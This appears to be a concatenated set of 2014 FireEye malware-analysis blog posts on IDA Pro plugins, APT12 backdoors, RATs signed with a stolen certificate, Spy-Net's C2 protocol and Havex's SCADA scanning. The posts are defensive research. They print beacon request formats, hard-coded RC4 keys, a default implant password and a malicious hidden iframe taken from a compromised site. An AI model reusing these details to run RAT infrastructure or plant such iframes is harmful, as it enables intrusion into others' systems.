You can take the following steps to setup the database file. You only have to do this once.



  1. Download and install an offline version of the MSDN documentationYou can download the Microsoft Windows SDK MSDN documentation. The standalone installer can be downloaded from Although it is not the newest SDK version, it includes all the needed information and data extraction is straight-forward.As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.



    Figure 6: Installing a local copy of the MSDN documentation


  2. Extract the files with an archive manager like 7-zip to a directory of your choice.
  3. Download and extract tilib.exe from Hex-Ray’s download page at 


    To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly.

  4. Run MSDN_crawler/ <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>



    With these prerequisites fulfilled, you can run the script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory.



You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File - Script file... (ALT + F7) to open the script named This will display the dialog box shown in Figure 7 that allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions, arguments and rename constants. If you change the settings and execute the plug-in by clicking OK, your settings get stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you do not choose to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element.


Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.


Figure 8: The plug-in’s preview of function annotations with repeatable comments


Similar Tools and Known Limitations


Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development.

Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element.

For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.

















<?xml version="1.0" encoding="ISO-8859-1"?>








<constants enums="MACRO_GENERIC">




<description>All possible access rights</description>





<description>Execute access</description>





<description>Write access</description>





<description>Read access</description>










Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function




In this post, we showed how you can generate a MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process!

Stay tuned for the FLARE Team’s next post where we will release solutions for the FLARE On Challenge (


Darwin’s Favorite APT Group


The attackers referred to as APT12 (also known as IXESHE, DynCalc, and DNSCALC) recently started a new campaign targeting organizations in Japan and Taiwan. APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army. APT12's targets are consistent with larger People's Republic of China (PRC) goals. Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan. Additionally, the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure, as APT12 used the same strategy after compromising the New York Times in Oct 2012. Much like Darwin’s theory of biological evolution, APT12 been forced to evolve and adapt in order to maintain its mission.

The new campaign marks the first APT12 activity publicly reported since Arbor Networks released their blog “Illuminating The Etumbot APT Backdoor.” FireEye refers to the Etumbot backdoor as RIPTIDE. Since the release of the Arbor blog post, FireEye has observed APT12 use a modified RIPTIDE backdoor that we call HIGHTIDE. This is the second time FireEye has discovered APT12 retooling after a public disclosure. As such, FireEye believes this to be a common theme for this APT group, as APT12 will continue to evolve in an effort to avoid detection and continue its cyber operations.

FireEye researchers also discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT. Both backdoors were dropped from malicious documents built utilizing the “Tran Duy Linh” exploit kit, which exploited CVE-2012-0158. These documents were also emailed to organizations in Japan and Taiwan. While APT12 has previously used THREEBYTE, it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE. Similarly, WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified. However, the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12.


From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE’s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication.


Figure 1: RIPTIDE HTTP GET Request Example

In June 2014, Arbor Networks published an article describing the RIPTIDE backdoor and its C2 infrastructure in great depth. The blog highlighted that the backdoor was utilized in campaigns from March 2011 till May 2014.

Following the release of the article, FireEye observed a distinct change in RIPTIDE’s protocols and strings. We suspect this change was a direct result of the Arbor blog post in order to decrease detection of RIPTIDE by security vendors. The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules. FireEye dubbed this new malware family HIGHTIDE.

HIGHTIDE Malware Family

On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account.



Figure 2:  APT12 Spearphishing Email

The exploit document dropped the HIGHTIDE backdoor with the following properties:








































MD5 6e59861931fa2796ee107dc27bfdd480
Size 75264 bytes
Complie Time 2014-08-23 08:22:49
Import Hash ead55ef2b18a80c00786c25211981570


The HIGHTIDE backdoor connected directly to If you compare the HTTP GET request from the RIPTIDE samples (Figure 1) to the HTTP GET request from the HIGHTIDE samples (Figure 3) you can see the malware author changed the following items:

  • User Agent
  • Format and structure of the HTTP Uniform Resource Identifier (URI)


Figure 3: HIGHTIDE GET Request Example

Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method.
























































































MD5 File Name Exploit
73f493f6a2b0da23a79b50765c164e88 議程最新修正及注意事項.doc CVE-2012-0158
f6fafb7c30b1114befc93f39d0698560 0824.1.doc CVE-2012-0158
eaa6e03d9dae356481215e3a9d2914dc 簡易名冊0全國各警察機關主官至分局長.doc CVE-2012-0158
06da4eb2ab6412c0dc7f295920eb61c4 附檔.doc CVE-2012-0158
53baedf3765e27fb465057c48387c9b6 103年第3屆通訊錄.doc CVE-2012-0158
00a95fb30be2d6271c491545f6c6a707 2014 09 17 Welcome Reception for Bob and Jason_invitation.doc CVE-2012-0158
4ab6bf7e6796bb930be2dd0141128d06 產諮會_Y103(2)委員會_從東協新興國家崛起(0825).doc CVE-2012-0158


Figure 4: Identified exploit documents for HIGHTIDE 

When the file is opened, it drops HIGHTIDE in the form of an executable file onto the infected system.

RIPTIDE and HIGHTIDE differ on several points: executable file location, image base address, the User-Agent within the GET requests, and the format of the URI. The RIPTIDE exploit document drops its executable file into the C:\Documents and Settings\{user}\Application Data\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\ folder. All but one sample that we identified were written to this folder as word.exe. The one outlier was written as winword.exe.

Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28.

THREEBYTE Malware Family

On Monday August 25, 2014 we observed a different spear phish email sent from to a technology company located in Taiwan. This spear phish contained a malicious Word document that exploited CVE-2012-0158. The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11.

Similar to the newly discovered HIGHTIDE samples documented above, this malicious document dropped a backdoor to C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe. This backdoor had the following properties:








































MD5 16e627dbe730488b1c3d448bfc9096e2
Size 75776 bytes
Complie Time 2014-08-25 01:22:20
Import Hash dcfaa2650d29ec1bd88e262d11d3236f


This backdoor sent the following callback traffic to video[.]csmcpr[.]com:


Figure 5:  THREEBYTE GET Request Beacon

The THREEBYTE spear phishing incident (while not yet attributed) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12:

  • The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors.
  • Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan.
  • Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe.
  • APT12 has previously used the THREEBYTE backdoor.

WATERSPOUT Malware Family

On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan. Attached to this email was another malicious document that was designed to exploit CVE-2012-0158. This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe. The backdoor had the following properties:








































MD5 f9cfda6062a8ac9e332186a7ec0e706a
Size 49152 bytes
Complie Time 2014-08-25 02:10:11
Import Hash 864cd776c24a3c653fd89899ca32fe0b


The backdoor connects to a command and control server at icc[.]ignorelist[.]com.

Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server.














GET /<string>/<5 digit number>/<4 character string>.php?<first 3 characters of last string>_id=<43 character string>= HTTP/1.1


Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)

Host: <C2 Location>

Cache-Control: no-cache


Figure 6: Sample GET request for WATERSPOUT backdoor

Although there are no current infrastructure ties to link this backdoor to APT12, there are several data points that show a possible tie to the same actors:

  • Same initial delivery method (spear phishing email) with a Microsoft Word Document exploiting CVE-2012-0158.


    • The same “Tran Duy Linh” Microsoft Word Exploit Kit was used in delivery of this backdoor.


      • Similar Targets were observed where the threat actors utilized this backdoor.


        • Japanese Tech Company
        • Taiwanese Government Organizations
        • Organizations in the Asia-Pacific Region that are of Interest to China


      • The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors:


        • C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe
        • C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\winword.exe


      • WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor.
      • APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed.
      • APT12 has the ability to adapt quickly to public exposures with new tools, tactics, and procedures (TTPs).
      • Public disclosures may result in an immediate change in APT12’s tools. These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented (e.g., WATERSPOUT).
    • Although these points do not definitively tie WATERSPOUT to APT12, they do indicate a possible connection between the WATERSPOUT campaign, the THREEBYTE campaign, and the HIGHTIDE campaign attributed to APT12.


      FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset. These development efforts may have resulted in the emergence of the WATERSPOUT backdoor.


      Figure 7: Compile dates for all three malware families 

      APT12’s adaptations to public disclosures lead FireEye to make several conclusions about this threat group:

      Though public disclosures resulted in APT12 adaptations, FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels. Similarly, the public disclosure of APT12’s intrusion at the New York Times also led to only a brief pause in the threat group’s activity and immediate changes in TTPs. The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report. Currently, APT12 continues to target organizations and conduct cyber operations using its new tools. Most recently, FireEye observed HIGHTIDE at multiple Taiwan-based organizations and the suspected APT12 WATERSPOUT backdoor at a Japan-based electronics company. We expect that APT12 will continue their trend and evolve and change its tactics to stay ahead of network defenders.

      Note: IOCs for this campaign can be found here.

FLARE IDA Pro Script Series: Automatic Recovery of Constructed Strings in Malware

The FireEye Labs Advanced Reverse Engineering (FLARE) Team is dedicated to sharing knowledge and tools with the community. We started with the release of the FLARE On Challenge in early July where thousands of reverse engineers and security enthusiasts participated. Stay tuned for a write-up of the challenge solutions in an upcoming blog post.

This post is the start of a series where we look to aid other malware analysts in the field. Since IDA Pro is the most popular tool used by malware analysts, we’ll focus on releasing scripts and plug-ins to help make it an even more effective tool for fighting evil. In the past, at Mandiant we released scripts on GitHub and we’ll continue to do so at the following new location This is where you will also find the plug-ins we released in the past: Shellcode Hashes and Struct Typer. We hope you find all these scripts as useful as we do.

Quick Challenge

Let’s start with a simple challenge. What two strings are printed when executing the disassembly shown in Figure 1?


Figure 1: Disassembly challenge

If you answered “Hello world\n” and “Hello there\n”, good job! If you didn’t see it then Figure 2 makes this more obvious. The bytes that make up the strings have been converted to characters and the local variables are converted to arrays to show buffer offsets.

Figure 2: Disassembly challenge with markup

Reverse engineers are likely more accustomed to strings that are a consecutive sequence of human-readable characters in the file, as shown in Figure 3. IDA generally does a good job of cross-referencing these strings in code as can be seen in Figure 4.

Figure 3: A simple string

Figure 4: Using a simple string

Manually constructed strings like in Figure 1 are often seen in malware. The bytes that make up the strings are stored within the actual instructions rather than a traditional consecutive sequence of bytes. Simple static analysis with tools such as strings cannot detect these strings. The code in Figure 5, used to create the challenge disassembly, shows how easy it is for a malware author to use this technique.

Figure 5: Challenge source code

Automating the recovery of these strings during malware analysis is simple if the compiler follows a basic pattern. A quick examination of the disassembly in Figure 1 could lead you to write a script that searches for mov instructions that begin with the opcodes C6 45 and then extract the stack offset and character bytes. Modern compilers with optimizations enabled often complicate matters as they may:

  • Load frequently used characters in registers which are used to copy bytes into the buffer
  • Reuse a buffer for multiple strings
  • Construct the string out of order

Figure 6 shows the disassembly of the same source code that was compiled with optimizations enabled. This caused the compiler to load some of the frequently occurring characters in registers to reduce the size of the resulting assembly. Extra instructions are required to load the registers with a value like the 2-byte mov instruction at 0040115A, but using these registers requires only a 4-byte mov instruction like at 0040117D. The mov instructions that contain hard-coded byte values are 5-bytes, such as at 0040118F.

Figure 6: Compiler optimizations

The StackStrings IDA Pro Plug-in

To help you defeat malware that contains these manually constructed strings we’re releasing an IDA Pro plug-in named StackStrings that is available at The plug-in relies heavily on analysis by a Python library called Vivisect. Vivisect is a binary analysis framework frequently used to augment our analysis. StackStrings uses Vivisect’s analysis and emulation capabilities to track simple memory usage by the malware. The plug-in identifies memory writes to consecutive memory addresses of likely string data and then prints the strings and locations, and creates comments where the string is constructed. Figure 7 shows the result of running the above program with the plug-in.

Figure 7: StackStrings plug-in results

While the plug-in is called StackStrings, its analysis is not just limited to the stack. It also tracks all memory segments accessed during Vivisect’s analysis, so manually constructed strings in global data are identified as well as shown in Figure 8.

Figure 8: Sample global string

Simple, manually constructed WCHAR strings are also identified by the plug-in as shown in Figure 9.

Figure 9: Sample WCHAR data


Download Vivisect from and add the package to your PYTHONPATH environment variable if you don’t already have it installed.

Clone the git repository at The python\ file is the IDA Python script that contains the plug-in logic. This can either be copied to your %IDADIR%\python directory, or it can be in any directory found in your PYTHONPATH. The plugins\ file must be copied to the %IDADIR%\plugins directory.

Test the installation by running the following Python commands within IDA Pro and ensure no error messages are produced:

Screen Shot 2014-08-01 at 1.06.24 PM

To run the plugin in IDA Pro go to Edit – Plugins – StackStrings or press Alt+0.

Known Limitations

The compiler may aggressively optimize memory and register usage when constructing strings. The worst-case scenario for recovering these strings occurs when a memory buffer is reused multiple times within a function, and if string construction spans multiple basic blocks. Figure 10 shows the construction of “Hello world\n” and “Hello there\n”. The plug-in attempts to deal with this by prompting the user by asking whether you want to use the basic-block aggregator or function aggregator.  Often the basic-block level of memory aggregation is fine, but in this situation running the plug-in both ways provides additional results.

Figure 10: Two strings, one buffer, multiple basic blocks

You’ll likely get some false positives due to how Vivisect initializes some data for its emulation. False positives should be obvious when reviewing results, as seen in Figure 11.

Figure 11: False positive due to memory initialization

The plug-in aggressively checks for strings during aggregation steps, so you’ll likely get some false positives if the compiler sets null bytes in a stack buffer before the complete string is constructed.

The plug-in currently loads a separate Vivisect workspace for the same executable loaded in IDA. If you’ve manually loaded additional memory segments within your IDB file, Vivisect won’t be aware of that and won’t process those.

Vivisect’s analysis does not always exactly match that of IDA Pro, and differences in the way the stack pointer is tracked between the two programs may affect the reconstruction of stack strings.

If the malware is storing a binary string that is later decoded, even with a simple XOR mask, this plug-in likely won’t work.

The plug-in was originally written to analyze 32-bit x86 samples. It has worked on test 64-bit samples, but it hasn’t been extensively tested for that architecture.


StackStrings is just one of many internally developed tools we use on the FLARE team to speed up our analysis. We hope it will help speed up your analysis too. Stay tuned for our next post where we’ll release another tool to improve your malware analysis workflow.

The Little Signature That Could: The Curious Case of CZ Solution

Malware authors are always looking for new ways to masquerade their actions. Attackers are looking for their malware to be not only fully undetectable, but also appear valid on a system, so as not to draw attention. Digital signatures are one way malware authors keep under the radar. Digital signatures are an easy, quick way to verify the authenticity of an application utilizing the signature.

Threat actors routinely steal digital signing certificates to hide in plain sight. There are recent reports of banking Trojans such as Zeus, using valid signatures to get past both automated and human defenses. Part of performing accurate threat intelligence is continually looking to the past to help better predict the future. This is proven in the samples we will be discussing in this blog. Many of the samples throughout this blog are from the summer of 2013. These particular samples however, piqued our interest because of the mass distribution of RATs in a particular targeted region. It also reminded us of a recent XtremeRAT blog we published earlier in 2014.

The Little Signature That Could

While investigating an uptick in Spy-Net spam campaigns, we came across a malware binary that was digitally signed that struck our interest. Spy-Net allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, running processes and services as well as capture images of the desktop and record form the webcam and audio. It also contains functionality to extract saved passwords and turn the victim into a proxy server. During the build process, an attacker can choose to enable a keylogger and evasion functionality designed to stop the information process if a debugger or virtual machine is found.

We noticed that one of the Spy-Net binary files, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, was utilizing a valid digital signature, from a company called CZ Solution Co. Ltd.


Figure 1: Signature Details of sc2.exe

Looking closer at the signature, we noticed that all of the details were intact, and appeared to be valid. There are two additional code-signing certificates issued to CZ Solution Co. Ltd.


Figure 2: Additional Signature Details

Investigation of sc2.exe showed typical Spy-Net behaviors. The sample beaconed out to From here, we decided to pivot off the CZ Solution signature and see what we could find.

Connections Emerge

As we started to pivot off the CZ Solution signature, we started to see some interesting commonalities. Pivoting proved that the CZ Solution signature was not just used in Spy-Net binaries. We quickly found that this signature was being used with XtremeRAT, a popular RAT that cybercriminals and targeted attackers use regularly. The code of XtremeRAT is shared amongst several other Delphi RAT projects including Spy-Net, CyberGate, and Cerberus.

XtremeRAT allows an attacker to:

  • Interact with the victim via a remote shell
  • Upload/download files
  • Interact with the registry
  • Manipulate running processes and services
  • Capture images of the desktop
  • Record from connected devices, such as a webcam or microphone

One binary for instance, m.exe (MD5: c27232691dacf4cff24a4d04b3b2896b) which was XtremeRAT, was seen beaconing out to http://omegaphotography.[co].uk, /1234567890.functions, and[plugin].xtr.

Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ Solution signature. Zeus modifiers can tune Zeus to steal information they are interested in; typically login credentials for online social networkse-mail accountsonline banking or other online financial services. Zeus is commonly seen targeting customers of financial institutions.

One of the Zeus samples, uk.exe (MD5: dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution signature, was beaconing out to

Looking at the three samples show that CZ Solution was used to create and sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the connections between the samples we profiled, you can quickly see how fast this web of similarities continue.

cz3Figure 3: Connection Profile of Binaries Using CZ Solution

The French Connection and C2 overlap

Attribution of actors and/or campaigns can often be a difficult and tedious task. However, since we were dealing with so many inter-twining binaries, we could start to draw some parallels between samples.

When looking at the overall connections between the CZ solution signature, you can start to see a trend emerge.  First, there is some C2 overlap. For instance Dllsv.exe (MD5: 3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to, using the same CZ Solution cert. This malware is flagged as BozokRAT; a user-friendly RAT that can upload and download files to and from a computer, modify registry entries, and perform other typical RAT functions. That same C2,, is also seen used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).

In another example of C2 overlap, a file named uk.exe, (MD5: 9c11ef09131a3373eef5c9d83802d56b) uses its C2 as This sample is an active Zeus binary. That same C2 is used with a file named x.exe, (MD5: c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.

Next, we needed to identify at least one infection vector to ensure we could track how one of the binaries using the CZ Solution signature was getting into environments.

In one case, we found the infection vector for an XtremeRAT binary that was using the CZ Solution certificate. The binary came in the form of phished email (MD5: 7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order.


The email was in French and the headers were interesting, as the same sender has been seen in multiple French spam runs.


The attachment in the email is using the RTLO trick to disguise a 7zip file as a PDF.

While looking at the all the samples we correlated and pivoted off of, we found that a majority of both the language and C2’s being used all revolved around the French language. The domains that were part of the C2 infrastructure were almost all exclusively French, as was the registrant information for the domains in question.

Spy-Net C2 Protocol Analysis

As we have already shared some analysis details of XtremeRAT in a previous blog, we decided to share some information and tools we built regarding Spy-Net this time. This information is based on our analysis of Spy-Net version 2.6 specifically. Other versions of Spy-Net may have significant changes to the protocol. Spy-Net 2.6 utilizes a homegrown protocol like many other publicly available RATs. It’s an ASCII based, pipe-delimited protocol utilizing Portuguese keywords that employs two totally different forms of obfuscation: one for outbound communication to the attacker and another for inbound communication to the implant. The outbound communications are compressed with zlib and encrypted with RC4. The RC4 key is hard-coded and is updated with version changes. For example, the RC4 key for Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for CyberGate 1.07, which has a similar (if not the same) protocol the key is njgnjvejvorenwtrnionrionvironvrnvcg107 and CyberGate 1.18’s key is njgnjvejvorenwtrnionrionvironvrnvcg117.

The astute reader may have noticed that the last three numbers of the CyberGate keys (roughly) represent the version number of CyberGate. The inbound communication to the implant employs an ASCII encoding scheme similar to Base64.  This protocol begins with a simple authentication scheme where the implant sends an authentication password that is validated by the client. This password is configurable by the attacker and defaults to abcd1234.  The implant then proceeds to send the entirety of its configuration information, as configured by the attacker, to the client so it can be displayed on its “Configuration” tab.


Implant->Client: mypassword|Y|

Configuration Request and Response

Client->Implant: configuracoesdoserver|

Implant->Client: configuracoesdoserver|configuracoesdoserver||#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program Files\Internet Explorer\iexplore.exe| | |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***| | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|

The outbound communications from the implant to the client are prepended with an ASCII representation of the length of the payload followed by a pipe character and a new line character.


There is a noticeable lack of sophistication in Spy-Net’s code. For example, in some cases the length indicator is followed by a pipe and a single new line (\n) character as seen in *nix based operating systems. In other cases, the indicator is followed by the carriage return and new line characters (\r\n), as seen in Windows operating systems. This lack of conformity is also witnessed in how there are two totally different schemes used for obfuscation, and in how obfuscation is not used for file transfers as it is otherwise used throughout the protocol.

Spy-Net Protocol Decoder

Since Spy-Net is a publicly available RAT that we see in use quite often, we decided to build a ChopShop module for it and share it in cooperation with our friends at MITRE.  The module is now available as a standard part of the framework available on GitHub.  We are also sharing a Spy-Net configuration dumping pycommand for Immunity Debugger.  While hunting for related samples in VirusTotal, we came across a pcap that had captured the initial infection and subsequent communication of the Spy-Net binary we initially mentioned, (MD5: 6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to test our new decoder. One thing that Spy-Net implants will commonly send out automatically is a thumbnail image of the user’s desktop. This is displayed on the client.


Our decoder can extract such images from the pcap and what we found gave us a further hint that we may be dealing with attacks focused in France. Although difficult to read due to the very low resolution of the thumbnail, our pcap decoder was able to tell us that the title of the browser window currently open in this screenshot is “Football - MAXIFOOT l'actualit  foot et transfert - Windows Internet Explorer.”


Distribution via Malicious Java Applet

According to the details of the pcap we decoded, this French football Web site ( was apparently compromised and had an iframe inserted into it that pointed to another compromised Web site, a Canadian addiction recovery resource:

<iframe width="1px" height="1px" src="hxxp://" style="display: block;" ></iframe>

The latter site hosted a malicious Java applet that downloaded the Pony/Fareit malicious downloader. The downloader then proceeded to install ZeuS and download and execute the aforementioned Spy-Net binary. All of these binaries were signed with the stolen digital certificate. The malicious Java applet used to install the Pony downloader was created by Foxxy Software and had been previously written about by ESET.

RAT Configuration Details

We assembled a compilation of the meaningful configuration data found in the XtremeRAT and Spy-Net samples we came across in our analyses. You can observe some similarities between the samples’ configurations.

Spy-Net 2.6
Spy-Net 2.6
XtremeRAT 3.5 Private
XtremeRAT 3.5 Private
XtremeRAT 3.5 Private
XtremeRAT 3.5 Private
XtremeRAT 3.5 Private
XtremeRAT 3.5 Private
XtremeRAT 3.5 Private


The usage of digital signatures isn’t going to decrease anytime soon- especially by threat actors. It gives them a quick, easy way to bypass traditional security controls since certificates and signatures are typically trusted by default. In this blog, we are shown that this trend still true. We looked towards the past in this blog, to better understand motivations and trends going forward. We can accurately say, based on the information attributed, that the CZ Solution signatures were being utilized by an individual or group of individuals using French assets and infrastructure.

These particular actors didn’t show a significant level of expertise, but did show collective resources with knowledge in at least Zeus, Spy-Net, and XtremeRAT. We can say accurately that it is likely these actor(s) were using the same signature to send out a wide range of binaries, possibly even outside of the realm of the four families discussed here. As we wrote this blog, we couldn’t help but be reminded of the spam run focused in Colombia and Central America that we wrote about back in February of this year. A spam run that is regionally focused, but with no apparent targeting in nature, utilizing a mix of ZeuS and off-the-shelf RATs.

Helping protect your organization from threats using valid digital signatures can include verification of the signature’s serial number. In this case, the serial number: 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52 8d 9e 65 10, is the identifier to locate in regards to this publisher. Also, if you’re running your own internal certificate authority, ensure you are adequately revoking certificates that may have been compromised. This will help ensure compromised certificates are not utilized in attacks.


Havex, It’s Down With OPC

FireEye recently analyzed the capabilities of a variant of Havex (referred to by FireEye as “Fertger” or “PEACEPIPE”), the first publicized malware reported to actively scan OPC servers used for controlling SCADA (Supervisory Control and Data Acquisition) devices in critical infrastructure (e.g., water and electric utilities), energy, and manufacturing sectors.

While Havex itself is a somewhat simple PHP Remote Access Trojan (RAT) that has been analyzed by other sources, none of these have covered the scanning functionality that could impact SCADA devices and other industrial control systems (ICS). Specifically, this Havex variant targets servers involved in OPC (Object linking and embedding for Process Control) communication, a client/server technology widely used in process control systems (for example, to control water pumps, turbines, tanks, etc.).

Note: ICS is a general term that encompasses SCADA (Supervisory Control and Data Acquisition) systems, DCS (Distributed Control Systems), and other control system environments. The term SCADA is well-known to wider audiences, and throughout this article, ICS and SCADA will be used interchangeably.

Threat actors have leveraged Havex in attacks across the energy sector for over a year, but the full extent of industries and ICS systems affected by Havex is unknown. We decided to examine the OPC scanning component of Havex more closely, to better understand what happens when it’s executed and the possible implications.

OPC Testing Environment

To conduct a true test of the Havex variant’s functionality, we constructed an OPC server test environment that fully replicates a typical OPC server setup (Figure 1 [3]). As shown, ICS or SCADA systems involve OPC client software that interacts directly with an OPC server, which works in tandem with the PLC (Programmable Logic Controller) to control industrial hardware (such as a water pump, turbine, or tank). FireEye replicated both the hardware and software the OPC server setup (the components that appear within the dashed line on the right side of Figure 1).




Figure 1: Topology of typical OPC server setup

The components of our test environment are robust and comprehensive to the point that our system could be deployed in an environment to control actual SCADA devices. We utilized an Arduino Uno [1] as the primary hardware platform, acting as the OPC server. The Arduino Uno is an ideal platform for developing an ICS test environment because of the low power requirements, a large number of libraries to make programming the microcontroller easier, serial communication over USB, and cheap cost. We leveraged the OPC Server and libraries from St4makers [2] (as shown in Figure 2). This software is available for free to SCADA engineers to allow them to develop software to communicate information to and from SCADA devices.


Figure 2: OPC Server Setup

Using the OPC Server libraries allowed us to make the Arduino Uno act as a true, functioning OPC SCADA device (Figure 3).


Figure 3: Matrikon OPC Explorer showing Arduino OPC Server

We also used Matrikon’s OPC Explorer [1], which enables browsing between the Arduino OPC server and the Matrikon embedded simulation OPC server. In addition, the Explorer can be used to add certain data points to the SCADA device – in this case, the Arduino device.


Figure 4: Tags identified for OPC server

In the OPC testing environment, we created tags in order to simulate a true OPC server functioning. Tags, in relation to ICS devices, are single data points. For example: temperature, vibration, or fill level. Tags represent a single value monitored or controlled by the system at a single point in time.

With our test environment complete, we executed the malicious Havex “.dll" file and analyzed how Havex’s OPC scanning module might affect OPC servers it comes in contact with.


The particular Havex sample we looked at was a file named PE.dll (6bfc42f7cb1364ef0bfd749776ac6d38). When looking into the scanning functionality of the particular Havex sample, it directly scans for OPC servers, both on the server the sample was submitted on, and laterally, across the entire network.

The scanning process starts when the Havex downloader calls the runDll export function.  The OPC scanner module identifies potential OPC servers by using the Windows networking (WNet) functions.  Through recursive calls to WNetOpenEnum and WNetEnumResources, the scanner builds a list of all servers that are globally accessible through Windows networking.  The list of servers is then checked to determine if any of them host an interface to the Component Object Models (COM) listed below:




Screen Shot 2014-07-17 at 12.31.56 PM



Figure 5: Relevant COM objects

Once OPC servers are identified, the following CLSIDs are used to determine the capabilities of the OPC server:

Screen Shot 2014-07-17 at 12.33.22 PM

            Figure 6: CLSIDs used to determine capabilities of the OPC server

